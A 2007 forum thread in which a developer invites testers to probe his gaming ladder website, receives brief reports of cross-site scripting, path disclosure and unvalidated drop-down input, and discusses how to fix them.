Kemik Posted August 24, 2007 Share Posted August 24, 2007 Hello all, I've coded a gaming ladder website using CodeIgnitor and I'd like to let you guys test it out, see what you think, find bugs, security holes, etc. The challenge system hasn't been finished yet so you won't be able to test that. This is mainly for you to find bugs in permissions and current forms and features. Here's the site: http://www.ocwars.com/v2/ There will be a database wipe before I go live so don't worry about damage (try to keep my table structures intact if u manage to screw with my validation ) Test to see if you can access the admin area too: http://www.ocwars.com/v2/index.php/admin/news Thanks for your help! Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/ Share on other sites More sharing options...
agentsteal Posted August 24, 2007 Share Posted August 24, 2007 Cross Site Scripting: There is Cross Site Scripting if the Website contains "code. Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.ocwars.com/v2/application/rapyd/. Drop Down Menu: If you edit the Country Code drop down menu you can submit arbitrary values. Includes Directory: http://www.ocwars.com/v2/application/rapyd/ Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/#findComment-333534 Share on other sites More sharing options...
Kemik Posted August 25, 2007 Author Share Posted August 25, 2007 Thanks for the heads up. Rapyd is a plugin library for CI so I'll have to go through it all and see where the problems are as I didn't code that. By the way, I noticed you signed up and created a clan. How did you manage to change then inputted country code from the drop down box to a? How did you manage to get around having a leader_id when creating a clan (hidden input) and a blank datetime? Thanks. Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/#findComment-333886 Share on other sites More sharing options...
Kemik Posted August 25, 2007 Author Share Posted August 25, 2007 I've fixed the user being able to access the directory and see the list of files, etc but how would I go about fixing the Full path disclosure? Google search just brings up different security reports of scripts but no solutions. Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/#findComment-333895 Share on other sites More sharing options...
Kemik Posted August 26, 2007 Author Share Posted August 26, 2007 Yeah I added that line, just in case there were errors. I'll add validation to the drop down menu, however wouldn't this be possible with most sites that use drop down menus? Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/#findComment-334522 Share on other sites More sharing options...
lightningstrike Posted August 27, 2007 Share Posted August 27, 2007 Not likely they usually have a strong validation set if they are well-coded. Changing a drop-down to invalid value will probably have it reset to a default, perhaps using a switch statement and default. Link to comment https://forums.phpfreaks.com/topic/66495-gaming-ladder/#findComment-335257 Share on other sites More sharing options...
Recommended Posts